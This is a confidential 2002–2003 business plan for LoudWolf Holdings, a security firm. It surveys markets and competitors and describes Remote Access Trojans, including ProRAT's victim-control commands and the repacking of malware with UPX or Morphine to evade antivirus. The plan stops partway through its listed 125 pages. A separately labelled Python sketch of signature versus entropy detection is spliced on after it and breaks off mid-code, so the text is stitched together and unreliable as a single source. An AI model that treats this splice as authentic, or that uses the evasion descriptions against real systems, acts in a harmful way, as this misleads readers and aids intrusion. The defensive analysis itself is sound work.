CONFIDENTIAL
Page 1 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Executive Summary
LoudWolf Holdings Ltd. is a limited liability corporation based in
Guernsey. Its primary focus is to act as a coordinating entity to exploit
the various technologies and products recently acquired by LoudWolf
from its contributing partners. These partners are companies that have
pooled their combined technologies and expertise into LoudWolf and are
now wholly owned subsidiaries of LoudWolf Holdings Ltd.
___Table of Contents 1________________________________________________
Contributing Partners .......................................... 5
Digital Animation Inc. ......................................... 5
Startech (US) Computer Consultancy Inc. ........................ 5
Startech Computer Consultancy Ltd. ............................. 5
Edison Research Labs ........................................... 5
Summary of Core Technologies ................................... 5
Business Overview .............................................. 6
Market Size .................................................... 7
Growth Trends .................................................. 7
Competitors .................................................... 8
Expected Competitor’s Responses ................................ 9
LoudWolf’s Competitive Strategy ................................ 10
Risk Factors ................................................... 11
Risk Factors & Their Mitigation ................................ 11
Competitive Products ........................................... 11
Loss of Trade Secrets .......................................... 11
Development Delays ............................................. 11
Government Interference ........................................ 11
Hacker Interference ............................................ 11
The Rixa “STEEL” Series – Born of Necessity .................... 12
Rixa STEEL Historical Context .................................. 12
Rixa Presents a New Challenge for IP Security Industry ......... 13
Background Regarding Security Issues ........................... 13
Stealth Trojans on the Horizon ................................. 13
Definitions of a Trojan ........................................ 13
The Stealth Trojan ............................................. 13
Trojans on the Web ............................................. 14
ProRAT Trojan .................................................. 14
ProRAT Commands ................................................ 15
Toquito Bandito ................................................ 15
Optix ICQ ...................................................... 16
Professional versions .......................................... 16
Wheels within wheels (Trojaned Trojans) ........................ 16
Commercial Countermeasures ..................................... 17
Trojan Hunter .................................................. 17
TDS3 ........................................................... 18
Anti-Anti-Virus functionality .................................. 18
Security Community Response .................................... 18
The Mature Hacking Corporation ................................. 19
The “Take” (Money to Be Made) .................................. 20
More Examples of IP Theft ...................................... 21
High-Value IP theft – A case study ............................. 22
Hackers Need Discipline Too .................................... 23
The WolfPak .................................................... 23
WolfPak Rules .................................................. 24
High-Value IP in today’s connected World ....................... 25
Hacker Quotes .................................................. 26
Analysis of Current Hacker Software ............................ 27
Purpose of This Document ....................................... 27
Cautionary Disclaimer .......................................... 28
Design Rules as a way of describing Functions .................. 28
Engineer’s Notes on Descriptive Style .......................... 29
The Threat, an Overview ........................................ 29
General description, Development Status ........................ 29
Software goals ................................................. 30
Overview ....................................................... 30
Standard IT Procedures on a Trojaned System .................... 31
A Scenario ..................................................... 31-33
How It Was Done ................................................ 34
___Table of Contents 2________________________________________________
Defining Terms ................................................. 35
Dangerous ...................................................... 35
Harmful ........................................................ 35
Nullable ....................................................... 35
Useful ......................................................... 36
Unknown ........................................................ 37
Benign ......................................................... 37
Fallback Procedures ............................................ 38
Note Regarding PNF Files ....................................... 38
Rules regarding PNF files ...................................... 39
Dealing With Threats ........................................... 40
The Trojan Masters – History and Splinter Groups ............... 41
Cyber Crooks ................................................... 41
Tech Officers .................................................. 41
Zombies ........................................................ 42
Extending the NameSpace ........................................ 42
Hackers United ................................................. 42
Design Rules ................................................... 43
First Infection ................................................ 44
Untraceable UDP Communications ................................. 44
Rules Regarding Communications ................................. 45
UDP & non-routable Protocols ................................... 45
PC HEALTH ...................................................... 45
Behavior & Sources of Code ..................................... 46
The Unexplained ................................................ 46
Pinch Points ................................................... 47
The Various Secrets of the Secret Vault ........................ 48
Cache Memory ................................................... 48
OS2 ............................................................ 48
DoubleSpace Drives ............................................. 48
Bad Blocks on Hard Disk Drives ................................. 49
Operating System Files ......................................... 49
System Restore Area ............................................ 49
Driver Rollback Files .......................................... 49
Windows \System Directory ...................................... 49
Page File ...................................................... 49
HiberFile ...................................................... 49
Exotic Operating Systems ....................................... 50
The Windows Registry ........................................... 50
Print Spooler .................................................. 50
USB devices .................................................... 50
Hiding Techniques .............................................. 51
NTFS Hidden Data Streams ....................................... 52
UPX Ultimate File Packer ....................................... 52
Morphine ....................................................... 52
Undetectables .................................................. 52
E. T. Phone Home ............................................... 52
Hacker Communications in General ............................... 53
Telephone Techniques ........................................... 53
Telephone Dial Up .............................................. 53
Telephone Techniques ........................................... 53
Anonymous Pager ................................................ 53
Call Back ...................................................... 53
Fax In & Out ................................................... 53
UDP Over Telephone ............................................. 53
ICMP ........................................................... 53
TCP/IP ......................................................... 53
Wireless Communications ........................................ 53
Blue Tooth ..................................................... 53
Radio Keyboards & Mice ......................................... 54
Infra-Red Communications ....................................... 54
Wireless Access to Non-Wireless ................................ 54
Audio Communications ........................................... 55
Soft Modem Communication ....................................... 55
Hacking With Audio Communications .............................. 56
Voice Command & Voice Recognition .............................. 57
User Names & Permissions ....................................... 58
Certificates of Authority & Digital Signature Certificates ..... 59
___Table of Contents 3________________________________________________
Persistence of Control - Hanging On ............................ 60
CMOS RAM ....................................................... 61
EEPROM ......................................................... 61
Error Messages & Other Time Gainers ............................ 62
Other Noted Trojan Functionality ............................... 63
LoudWolf Solutions ............................................. 64-67
Rixa STEEL Secure Servers ...................................... 68
Rixa STEEL Concept ............................................. 69
Product Description ............................................ 70-72
Military Servers ............................................... 73
Commercial Servers ............................................. 74
General Topography ............................................. 75
Consumer Systems ............................................... 76
STEEL Standard equipment ....................................... 77
SuperKey Technologies .......................................... 78
The Problem .................................................... 78
Security Encryption Today ...................................... 78
Every-day Security ............................................. 78
Vital Security ................................................. 78
Unbreakable Security - Isn’t ................................... 78
The Best Encryption Available .................................. 79
The LoudWolf Way ............................................... 79
Superkeys Product Description .................................. 80
Implementation of a Hardware Session Key ....................... 81
Why Keys are So Important ...................................... 82
Anatomy of a Key-Breaker Program ............................... 82
The “Dictionary Attack” ........................................ 82
Combination Word Attack ........................................ 82
Multiple Language Variant ...................................... 82
Number Substitution ............................................ 82
The Brute Force Attack ......................................... 82
Components of the Super-Key Product ............................ 83
Key Length & Complexity Issues ................................. 84
Variables as Key Components .................................... 85
Secure Satellite Superkeys Sample Application .................. 86
The Sentinel Series ............................................ 87-89
The Sentinel Sharp ............................................. 87
Sentinel Standalone Functionality .............................. 89
Hot ROD Read Only Drive ........................................ 90
HVIP Drive Chemical Erasure System ............................. 91
Business Plan Implementation ................................... 92
Overview ....................................................... 92
Time Lines Months 1-7 .......................................... 93
Time Lines Months 8-12 ......................................... 94
End of First Year Summary ...................................... 94
Time Lines Months 13-16 ........................................ 95
End of Second Year Summary ..................................... 95
End of Third Year Summary ...................................... 95
Budget Assumptions ............................................. 96
Average Salary Per Category of Job ............................. 96
Headcount Over Time ............................................ 96
Reference Section .............................................. 97
Rixa STEEL Utility Board Documentation ......................... 97
Micro-Controller Specifications ................................ 98
Processor Schematic Diagram .................................... 99
Printed Circuit Boards & Schematics ............................ 100
Software Guidelines & Connection Lists ......................... 101-107
Trojan Read Me Files ........................................... 108-118
Hacker Defender ................................................ 108-116
Optix Pro ...................................................... 116-117
FuRootKit ...................................................... 118
In the News .................................................... 119
Biographies .................................................... 120
Paul Fullwood .................................................. 120-125
THIS DOCUMENT CONTAINS HIGHLY CONFIDENTIAL INFORMATION AND MAY CONTAIN ELEMENTS OF CERTAIN PROPRIETARY PRODUCTS, SERVICES AND BUSINESS
INTELLIGENCE WHICH, IF DISCLOSED, MAY CAUSE HARM TO COMPANIES AND INDIVIDUALS - PLEASE DO NOT COPY OR DISTRIBUTE.
Contributing Partners
Digital Animation Inc.
A Silicon Valley-based company specializing in the development of complex software for the encoding and
decoding of highly compressed and secure data streams.
Startech Computer Consultancy Inc.
A Los Angeles-based company, specializing in the development and production of custom integrated hardware
and software products for the television and movie industry.
Startech Computer Consultancy Ltd.
A UK-based hardware & software development company specializing in circuit design for industrial automation.
Edison Research Labs
A Central California-based R&D partnership focused on security research and advanced countermeasure
development.
Summary of Core Technologies
As a result of the acquisition of these companies, LoudWolf owns and controls all aspects of several new and
important technologies. These combined technologies are focused in the following areas:
- Process-based computer security systems for military, industrial and commercial applications.
- Hardware-based security devices and technologies for high-value intellectual property protection.
- Advanced computer intrusion detection systems for high-security military data systems.
- Personal privacy, spyware detection technology and data theft protection software systems.
- Hardware-mediated system integrity and verification systems.
- Cryptographic key systems, utilizing hardware-based keys and non-shared secret key technology.
- Encoding systems for advanced compression and secure delivery of entertainment and educational media.
- Encoding systems for secure transmission of high-value data over insecure pathways.
Business Overview
One of the major difficulties we have faced during the preparation of our business strategy has been the
large number of products envisaged. In two years of fundamental product research we have produced
dozens of potentially marketable solutions and products. Only a selected few products have been presented
in this document. One of the first imperatives as we move forward will be a thorough review of all of these
products with a view to extracting the best of these possibilities for further analysis. It must be assumed that
this review will produce additions and modifications to our product line.
The need for the type of security that LoudWolf provides is clear. LoudWolf has identified large markets in
multiple industries that are clearly awaiting the introduction of the definitive and complete intellectual
property protection system.
The investment opportunity presented clearly has a huge potential. LoudWolf will provide “enabling
technology” for various large market sectors.
The full exploitation of all of the opportunities afforded by these broad technologies will involve
numerous partnerships with industry-leaders, aggressive protection of LoudWolf’s intellectual
property and judicious maintenance of market leadership.
In some cases LoudWolf will act as a technology provider rather than a manufacturer / distributor. We
will license our technology to companies who can efficiently sell into their existing markets. In other
cases the technology lends itself to direct sale to consumer, industry and military customers.
In these areas maintenance of market share may involve anti-competitive measures, such as; acquisitions of
fledgling competitors, enforcement of patents and so on. For this reason we will depend heavily on expert
management decisions pertaining to our market protection and anti-competitive strategies.
The various new technologies we will be introducing must be revealed, implemented and exploited with
extreme delicacy. Patents, trade secrets, copyrights and brand-name maintenance must all be coordinated as
a whole so as to ensure maximum investor return. We may hold back on the introduction of certain products
or technologies in certain market segments in anticipation of earning greater rewards by implementing these
technologies at different times. For example:
It would not be unreasonable to withhold a consumer-level product incorporating the concept of super keys
until such time as the military implementation of these super keys has been exploited to its fullest. This is
consistent with our financial and marketing model, which prescribes the relative marketing economy derived
from direct sales to the military: it gives LoudWolf the opportunity for early revenues without a large sales and
marketing effort and provides us with high-profile reference customers which, in turn, naturally eases the
task of introducing our commercial and consumer products to market at some later date.
Effective exploitation of our discoveries and innovations can be assured only by utilizing the very best of
marketing and business expertise available. The full potential of LoudWolf can be effectively realized by the
delicate application of our existing management expertise provided with sufficient capital to generate a
powerhouse group of companies. We are confident that we can then maintain market leadership in a
multitude of markets. The business structure that we have created is designed to form an effective launch
pad for this strategy.
We have designed various short-term profitability products with short time-to-market timelines; these are
intended to be distributed by several reliable partners. We also have several mid-term, high-potential products,
many of which imply long-term, ongoing revenue streams. In addition we possess a small number of
market-controlling fundamental technologies. Whilst we cannot expect to maintain dominance in all aspects
of our enterprise, we can certainly anticipate a high likelihood of significant return for our investors. The team
of experts we are assembling for these tasks provides us with an enhanced certainty of success.
Market Size
LoudWolf’s technologies are applied to various products and services described herein. The market for these
various technologies is very large indeed, encompassing a broad swath of markets including, but not limited
to, the following areas (estimated annual market, in US Dollars):

Market segment                                              Estimated market
Tactical and strategic military computing devices           20 Billion
Commercial data communications systems                      10 Billion
Personal computer security products                         10 Billion
Enabling technology in entertainment media transmission      1 Billion
Enabling technology in media compression systems             2 Billion
Total overall sales per year                                43 Billion
Growth Trends
The growth of these markets exceeds the growth in the overall worldwide computing technology sector due
to existing need to add our technologies to the current installed computer user base in addition to the
incorporation of our technologies into new computer systems. Many of the threats and solutions presented
are not yet widely known and as such are un-tapped markets with growth curves typical of emerging
technologies.
Security Related Growth
The computer security industry enjoys one of the highest growth rates in the world. For example, in just a
few short years the anti-virus program has transitioned from an optional component to essential software for
all computers. We are in the midst of a further transition from “security as a one-time purchase” to “security
as a subscription service”. Security technologists are in high demand, one of the few computer technical
specialties still in short supply after the ballooning of tech resources in the period 1998-2000.
Security is an industry that grows when stimulated by advances in hacker technology. “Fed by fear”, one
could say. Described in this document are several hundred advances in hacker technology, any one of which
could, and should, be feared. Growth of this market is assured; in fact, to keep up with the hacker techniques
we will describe, it must accelerate dramatically.
Competitors
Leaving aside LoudWolf’s data compression technology, which has no known competitors, the main
competition comes from established companies in the computer security sector:
Computer Associates
McAfee
Norton
FarStone
Internet Security Systems (ISS)
Trend Micro
At this time, all of the companies mentioned are in a position to make inroads into LoudWolf’s market. We
can expect that after we launch various products we will see some combination of the following responses
from these companies, and possibly from new startup companies that form to build upon our
technologies as they are released.
The following companies have capabilities that may affect portions of some of LoudWolf’s key technologies:
DiamondCS
VCom
IBM
Mischel Internet Security
In-Q-Tel (investees)
Expected Competitor’s Responses
- Competitors will attempt to incorporate LoudWolf’s hardware integration into their existing software offerings, either by licensed cooperation or by emulation of LoudWolf’s systems.
- Competitors will begin development of competitive, or perhaps more advanced, fully integrated hardware and software systems.
- Competitors will seek to acquire LoudWolf technology and incorporate elements into their existing products and services.
- Competitors will attempt to acquire LoudWolf in its entirety.
- Competitors will attempt to block or work around LoudWolf’s copyrights and patents.
- Competitors will seek to insert additional products into and around LoudWolf’s core technology.
- Competitors will attempt to exert financial pressure on LoudWolf by discounting competitive products and / or outspending LoudWolf in marketing funds.
- Competitors will seek to acquire experienced LoudWolf personnel familiar with LoudWolf’s core technologies and future planning.
LoudWolf’s Competitive Strategy
Fundamental to our competitive strategy is the overall pacing of product releases. The skillful deployment of
our products enables a rapid market penetration to be followed by a series of product enhancements to the
core components, adding layers of protection, in keeping with the layered nature of the threats that our
products address.
To a certain extent, LoudWolf can control market demand by the release of “proof of concept”
demonstrations of threat vectors. In fact, in some cases, the vulnerability is not well understood by the
security community and must be “seen to be believed.” Therefore, sometimes it is essential to demonstrate
the vulnerability along with the LoudWolf solution that mitigates the threat.
As LoudWolf rolls out its various technologies, we will look for opportunities to license certain aspects of our
technology to our own potential competitors. The selection of these technologies and the licensee
companies, along with the license terms and conditions, are crucial anti-competitive decisions. The strategic
goal is to forestall independent development of competing technologies and to rapidly advance the market
penetration of our own core technology.
The judicious application of marketing funds towards overall “brand name” development will be required to
maintain and enhance our initial technological leadership in the marketplace. Assisting in this effort, we will
seek to leverage a well-known name by partnering with one of several established security companies,
e.g. Brinks, Securicor, Wells Fargo, Chubb, Yale and the like. Bringing in such a name, whether by
revenue sharing, acquisition or merger, is considered by LoudWolf an accelerator, rapidly establishing
both a brand name and an overall company valuation multiplier. Failing this, LoudWolf will seek to establish
its own brand name via a re-ordering of its product offerings, launching its high-end military systems first
and leveraging the “as used by the military” credentials down through the industrial, commercial and
personal user markets.
In order to maintain a leadership position, it is essential that we maintain a steady stream of enhancements
to our deployed products. The timely development and release of additional enhancement products must be
considered in order to protect our market share, once established.
LoudWolf’s ability to expand its initial offering by producing a range of compatible products is a key to
maintaining market dominance. All LoudWolf’s deployment plans are therefore coordinated according to an
overall marketing plan rather than being technology-driven. Our focus is on the growth of revenues and
market penetration rather than the deployment of technology for the sake of technology.
All of LoudWolf’s products are designed to be backward compatible with our previous offerings, allowing for
transition from a sales model to a subscription model or, for our military products, an upgrade model, as the
installed user base grows.
Risk Factors
Competitive Products.
Despite extensive and ongoing research, we have not discovered any company encroaching into our core
area of expertise. Nevertheless, this does not mean that there are no companies working on products similar
or identical to some of our existing or proposed products.
It is conceivable that several of our intended products may be developed and released prior to our own, thus
eliminating our “first to market” advantage, and possibly forcing us to reconsider or re-design the product.
This may lead to cost overruns or even product cancellations. Furthermore, our projected revenues from rescheduled or cancelled products may affect our existing cash flow forecasts and revenue projections.
Loss of Trade Secrets.
As product development moves into full swing, it will be necessary to divulge the design details of our core
technologies to a much broader group. There exists a risk that these details may find their way into
competitive companies’ hands, thus eliminating our current lead in research and development. Furthermore,
these companies may have better funding and / or be better equipped to deploy these technologies than
LoudWolf, leading to similar consequences to those described above.
Development Delays.
Several of our products incorporate a complex software development component. Software projects, in
general, are often difficult to budget accurately. Delays caused by inaccurate scheduling can seriously affect
the project’s R&D budget, its associated hardware ship-dates and subsequent revenues.
Government Interference.
Some of our products are designed for military and / or government agency uses, as such there may be
forces brought to bear designed to encourage exclusive sales to one particular government, agency or group.
Stockholder bias and or commercial expediency may prevent or delay release of certain high-end products to
wider markets.
Hacker Interference.
It can be expected that hacker groups of various types and sizes will attempt to gain knowledge of
LoudWolf’s products, for the purposes of circumventing them post-release or, perhaps, attempting to prevent
the release of products that present a threat to their activities. LoudWolf has experienced this activity
already and has been the target of a multitude of serious hacker group attacks. LoudWolf faces a risk that its
own development systems might be successfully compromised by these groups, which may result in data loss
and product development delays.
It should be noted, however, that this type of attack has already occurred many times. On numerous
occasions LoudWolf systems have been penetrated and / or destroyed, resulting in data loss, development
delays and expenses related to the re-building of software systems. The weathering of these storms has
generally resulted in the hardening and verification of the effectiveness of LoudWolf’s technologies, and
forced us to make certain changes in development methods and backup procedures. These attacks, though
not pleasant, are on the whole considered a “necessary evil.”
The Rixa “STEEL” Series - Born of Necessity
Rixa STEEL: High-value intellectual property protection.
The RIXA brand and the RIXA portions of the RIXA STEEL
concept are incorporated into LoudWolf technologies by
the acquisition of Digital Animation Inc. The following
narrative describes the history of the product along with an
overview of its operational parameters.
Rixa STEEL “XA” Historical Context
Digital Animation Inc. began developing the Rixa STEEL “XA” concept in Q4 2001. Development was handed
over to Edison Labs in January 2003. In 2001, Digital Animation was demonstrating its revolutionary
technique for compressing, transmitting and decompressing high-value, animated entertainment feature films
over the Internet. This product was the culmination of years of development and 1.1 Million U.S. Dollars of
funding. Prior to test deployment of the product, Digital Animation ran across a seemingly insurmountable
roadblock--The unexpectedly difficult task of protecting the high-value feature films on its servers.
The Rixa STEEL system was born of necessity. We became aware of a number of serious security flaws in
the then “state of the art” server software. This was underlined for us in a very dramatic fashion as the
hacker community became aware of our product following a five-city tour of China in October 2001, which
garnered a good deal of media and hacker attention.
The hacker community apparently saw Rixa technology as an opportunity for profit by using it to create a
swapping service much like Napster for video entertainment. A coordinated attack was launched upon us
with the apparent goal to preempt our product launch and steal our encoding software and encryption keys
directly from our development servers in Silicon Valley!
By chance, we headed off the attempted theft, and by another fortuitous circumstance were able to log the
hacker’s methodology. To our dismay, we were able to discern that the best of the hackers’ software was far
more sophisticated than that we had anticipated. Indeed, the suite of programs we now had in our
possession was, and still remains, unmentioned in the security literature and has been all but ignored by
national infrastructure security organizations such as CERT, NIST, etc. This was no Nimda or Goner virus,
not even a Back Orifice Trojan horse. This software was more subtle, much more clandestine, designed to
elude detection and persist indefinitely, acting as a permanent “spy in the works.”
The operational details of this ‘spy-ware’ can be found elsewhere in this document. The experience we gained
being exposed to the latest in cyber “crime-ware” and being able to capture this code for analysis was quite
an “eye opener.”
We had spent a good deal of effort in achieving an impregnable client-side security solution. We had
mistakenly assumed that the issue of server side security was better left in the hands of the experts in the
field. The revelation of the software we had now acquired proved, beyond a shadow of a doubt, that even
the most secure [server-side] software was grossly inadequate to protect the high-value intellectual property
of our prospective clients.
Analysis of this software proved that all of the commonly used operating systems that run today’s computer
and internet infrastructure were, to a greater or lesser degree, susceptible to this spy-ware and could not be
considered candidates for the operating and security system’s hosting and protecting of high-value
intellectual property. It became clear that we must undertake the project of providing end-to-end security for
our clients or face the prospect of being both the first company to transmit pay-per-view video on demand
over the internet and the first to lose all of their content to hackers in one stroke.
Rixa Presents a New Challenge for the IP Security Industry
Rixa technology enables the compression of animated feature-length entertainment to such a high degree of
efficiency that it can be transmitted at better-than-DVD quality in LESS than real time. (Typically a 90 minute
feature in 30-40 minutes.) This novel technology presents the content and infrastructure owners with a series
of new challenges, especially where security is concerned. Imagine the scenario - Rixa transmission
technology presents a wonderful opportunity to the content owners. Rixa compresses the entertainment
video so well that it becomes possible, for the first time, to distribute full-screen, full-motion, entertainment-quality content over the existing Internet. This opportunity is nothing short of outstanding for content
owners! However, it also serves as a “honey pot” of great value to intellectual property pirates. For the
cyber-thief, the prospect of a server full of highly compressed and therefore “shareable” content presents a
Napster-like opportunity not to be missed. A rich target indeed. And targeted we were!
Background Regarding Security Issues
We are familiar with the common security threats we all face as computer users. We all have anti-virus
programs installed on our systems, and have become familiar with the names of some of the more malicious
virus threats such as Nimda, Goner, CAK Worm, SirCam and Code Red. These virus programs come in all
forms and can cause, to greater and lesser degrees, data loss and security compromise. The standard
information technology response to an infection is “run a clean-up utility, update your anti-virus software and
get back to work.” In the more serious cases, the standard response is preceded by the more drastic,
“reinstall your system software and restore your data from a backup.” (If you have one.)
This is assuming that you know you have a problem. The virus threat is the beginning of a security issue, not the entire issue. It is the entry point for software that penetrates the “outer skin” of the system. In the past, amateurs have designed these virus programs. Their function is to spread, propagate and, in the worst cases, destroy data. Often the onset is announced. For example, Nimda says “HI” while the Goner virus advises, “You are a GONER.” Up until recently, the compromise has always been announced, or is easily recognized, as the system becomes damaged either by the virus destroying files or as a result of the congestion of system resources caused by unchecked replication on the system. In either case, system compromise is revealed to the user by a bold announcement or by obvious signs of infection. Things are about to change.
Stealth Trojans on the Horizon - Definitions of a Trojan
The Trojan horse, named after the mythical wooden horse in Homer’s Iliad, was built by the Greeks while
besieging the city of Troy. Its contents were a “payload” of Greek soldiers, which, once brought inside the
city gates, deployed with devastating results.
The modern-day software version of the Trojan horse contains a payload of programs. In most cases the payload is an illicit server that can be contacted by its masters to provide unmonitored, clandestine access to the target network for the delivery and receipt of data and/or additional software.
The first of these Trojans to gain some degree of notoriety was the unauthorized use of a legitimate remote control program called NetBus. Building upon this success, the hackers perfected a more sophisticated clandestine remote access system with the moniker Back Orifice (a pun on Microsoft’s Back Office system, a postmaster control program for many corporate systems). Back Orifice and other Trojan programs are designed to give the hacker access to the entire target network and remain hidden from view indefinitely. The fact that the security community is aware of Back Orifice would indicate that, in this regard, it is a failure.
The Stealth Trojan
Are we to assume that the hacker community is entirely composed of amateurs? Should we rest assured that the hubris of the hackers will remain such that they cannot resist the temptation to reveal their presence on our systems and effectively announce, “Look at me, am I not smart? I have penetrated your system!” Will the cyber pirates continue to be kind enough to let us know when we are compromised? No, of course not.
Building upon the success of their amateur comrades, a new breed of cyber criminals is now reaching maturity. We are now entering a new age of computer crime: more organized, more discreet, driven by profit and power rather than pride and anonymous peer recognition. Examples of clandestine Trojans are: Vanquish, Assassin, Sub7, BO2K (updated Back Orifice), Optix Pro, FuRootKit, Eternity, FunFactory, Insurrection, ProRAT, Theef, SPARTA, ToquitoBandit, HackerDefender and hundreds more.
Trojans on the Web
These Trojan suites, or Remote Access Trojans (RATs) as they are called in hacker parlance, are freely available on the web; they can be downloaded and used to control other computers on the Internet. The degree of control is astonishing: these programs allow access to your computer as if the hacker were at your keyboard and in possession of all your passwords. The hacker can view your desktop in real time (if your Internet speed is good enough) or, on slower connections, take screen-shots while controlling your system from a command screen similar to a Telnet screen.
The Trojan software is a collection of programs, or a “suite”. There are always at least two parts to any Trojan suite (often there are many). The minimum Trojan consists of:
1/ The program which resides on the victim’s computer allowing access and remote control. This is referred to as the “Server”.
2/ The program which runs on the hacker’s system and is used to connect to the Server on the victim’s computer, known as the “Client”.
The Server is designed to be invisible; it is a small program that runs every time the victim’s machine starts or, in some cases, activates at preset times.
The Client program runs on the hacker’s machine and ranges in complexity from a simple Telnet command screen to a full-blown graphical user interface, such as the ProRat V1.6 screen shown below.
Notice the various command buttons available to the hacker. Obviously this is a powerful and dangerous tool, but also note the easy-to-use point-and-click nature of this software. Very little, if any, programming or software knowledge is required in order to wreak havoc or spy unobtrusively.
Commands available on an example Trojan (ProRat 1.6).
PC Info – Collects and displays information about the victim’s machine & software.
Message – Send a message to the victim.
Chat – Chat with the victim.
Funny Stuff – e.g. open & close the CD drawer, switch the mouse buttons, flash the keyboard LEDs.
IE Explorer – Open Explorer for access to the Internet and/or HTML files on the victim’s computer.
Control Panel – Open the Control Panel; allows access to hardware, software & security settings.
Shut Down PC – Shut down or re-boot the victim’s machine.
Clipboard – View the victim’s clipboard, copy to the victim’s clipboard.
Give Damage – Destroy files, damage system files, erase configuration data, etc.
R. Downloader – Remotely download files from the victim’s computer.
Tools – Various tools to hide programs & manipulate files and server settings.
On-Line Editor – Edit text files on the victim’s system.
Printer – Send data to the victim’s or a local printer.
Applications – View and/or run applications on the victim’s computer.
Windows – View or add a window on the victim’s computer, open a local window.
FTP & Telnet – Run a textual command screen interface to the victim’s computer.
File Manager – View & manipulate files on the local or the victim’s computer.
Search Files – Search for filenames or files containing a particular word.
Registry – Edit registry settings on the victim’s computer.
Screen Shot – Get an image of the victim’s screen.
Key-logger – Start/stop a program which records every key press on the victim’s computer.
Passwords – Get the victim’s passwords.
Run – Run a program locally or on the victim’s computer.
Create – Create a file, a folder, or a new victim profile.
Many other functions are available depending on the suite that is used. One popular function absent
from ProRat is the “Remote Desktop” feature that works mainly with Windows XP systems allowing
the hacker to view and control a remote version of the victim’s desktop.
Toquito Bandito - Remote Access Trojan (RAT) selection of screen-shots
Other Trojan components have specific purposes such as hiding utilities, remote paging, music trolling, password stealing, e-mail forwarding, etc.
Optix ICQ Pager notifying tool.
Part of the Optix Pro Trojan suite, this is an ICQ paging tool that notifies the hacker of a successful take-over of a victim. This program gains trusted Internet access permissions from other programs such as Outlook or Windows Media Player to successfully bypass all firewalls!
The Professional versions
These programs are not viruses; their goal is to control your system, not merely to replicate and/or damage files. Their purpose is clandestine monitoring and control. These programs are designed to hide. They promise the hacker anonymity and allow them to roam the Internet freely capturing victims. These Trojan operators are the so-called “Script Kiddies”. They use programs others have built to perform their evil deeds.
However, there are better programs than these that are not so well known. The Trojan writer, referred to in this document as the “Trojan Master”, is generally not going to allow his hard work in creating a Trojan to be squandered by releasing the software to all and sundry on the Internet. No. The Trojan Master is several levels ahead of these free downloadable versions. The Trojan Master shares his wares not at all, or only with a select few peers (usually in exchange for complimentary software). These are the most dangerous people on the Web.
The Trojan Masters refrain from releasing their software widely, since it is obvious that once in the hands of many “Script Kiddies” it will sooner or later be detected, captured and analyzed by the security community. Soon after, Microsoft releases a patch and the security companies release an updated scanner to block access. The effectiveness of the software is crippled (although it should be noted that patches and updates are never applied in a timely manner nor to every computer). Nevertheless, it should be clear that this type of software has its highest value only if kept totally secret. And secret it is indeed. We should note also that the term “Trojan Masters” may apply to individual talented programmers, teams of programming friends in close association, distributed groups of anonymous contributors, large corporations and government agencies. Their goals are varied, but all share one overriding desire: to gain the ability to control as many systems as possible (known in hacker parlance as “extending the name-space”) and to use this power to gain access to intellectual property (IP) of all flavors at times of their choosing.
Wheels within Wheels
The Trojan is sneaky software. The Trojan Masters are, by nature, sneaky people. Many have seen an opportunity to gain control of massive numbers of computers by “Trojaning” the Trojans. Simply put, the release version of a Trojan will produce hundreds of thousands of isolated attacks in the hands of the Script Kiddies. If the software is subtly tweaked, just a little bit, it can be designed to leave a “back door” for the Masters, who can later browse through the Script Kiddies’ victims at will. Clearly a tempting “master-stroke” of deception. And many of these Trojans do just that. They are “back-doored” in hacker parlance. Ironically, the Script Kiddies (who often consider themselves bold hackers) are, in effect, hacked themselves and manipulated by the Masters. Just one Trojan (Optix Pro) from one download site had logged 275,000 downloads as of April 2004! The overall number of Trojan suites in the hands of the Script Kiddies is, conservatively put, in the tens of millions!
Commercial Counter Measures
These Trojans are designed to elude anti-virus and firewall programs, and so it follows that before they are widely released they do just that. There is no defense at all against a “fresh” Trojan.
The Trojan Masters are talented folks and they have a permanent advantage over the counter-measure community, because the Masters have the anti-virus programs to test their work with, whereas the counter-measure community has no way to view the Trojan Masters’ programs before they are captured and analyzed. Hence, the Trojan Master will test his software against all known detection systems to be sure that he has circumvented them all before he begins his attacks.
Only by accident will the Trojan be captured. Of course the Trojan Master will take care to elude capture as long as possible. Even after capture and detection the Trojan Masters have many tricks to eke out some more effectiveness from their software. Utilizing UPX encoding and/or Morphine to cloak their software (see Reference section), the captured Trojan can be given a new lease on life as a variant that once again eludes the signature-sniffing anti-virus software. In short, countermeasures don’t work at first and thereafter are only partially effective.
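Added illustration, not from the LoudWolf document: the Python sketch below contrasts the literal byte-signature check described above with a simple entropy heuristic that defenders use to flag packed executables. Every input is constructed (the “captured” body is pseudo-random filler with an embedded marker, that marker is the signature, and zlib stands in for UPX-style compression), so it runs offline.

```python
import math
import random
import zlib
from collections import Counter

# Constructed marker standing in for the byte signature a scanner extracts
# from a captured sample. No real malware signature is used.
SIGNATURE = b"FAKE-RAT-SERVER-V1"

# Heuristic threshold (bits per byte) for "this looks packed or encrypted";
# assumed for this example, real products tune it per file section.
ENTROPY_THRESHOLD = 7.0


def build_captured_body(seed: int = 7, size: int = 8000) -> bytes:
    """Constructed stand-in for a captured Trojan body: pseudo-random filler
    drawn from a 16-symbol alphabet (about 4 bits of entropy per byte, in the
    range of ordinary code and text) with the marker embedded in the middle."""
    rng = random.Random(seed)
    alphabet = b"0123456789ABCDEF"
    filler = bytes(rng.choice(alphabet) for _ in range(size))
    half = size // 2
    return b"MZ" + filler[:half] + SIGNATURE + filler[half:]


def pack(data: bytes) -> bytes:
    """Stand-in for UPX-style run-time packing: the original bytes are stored
    compressed behind a small loader stub, so they no longer appear literally.
    zlib only mimics the effect; it is not what UPX or Morphine do internally."""
    stub = b"MZ" + b"STUB"  # hypothetical loader stub, constructed
    return stub + zlib.compress(data, 9)


def signature_match(data: bytes, signature: bytes = SIGNATURE) -> bool:
    """The 'signature-sniffing' check: a literal byte-pattern search."""
    return signature in data


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 maximum)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_flag(data: bytes, threshold: float = ENTROPY_THRESHOLD) -> bool:
    """Packing heuristic: compressed or encrypted bodies approach 8 bits/byte."""
    return shannon_entropy(data) >= threshold


def scan(data: bytes) -> dict:
    """Run both checks and report, so the two outcomes can be compared."""
    return {
        "signature_hit": signature_match(data),
        "entropy": round(shannon_entropy(data), 2),
        "packed_suspect": entropy_flag(data),
    }


if __name__ == "__main__":
    original = build_captured_body()
    packed = pack(original)
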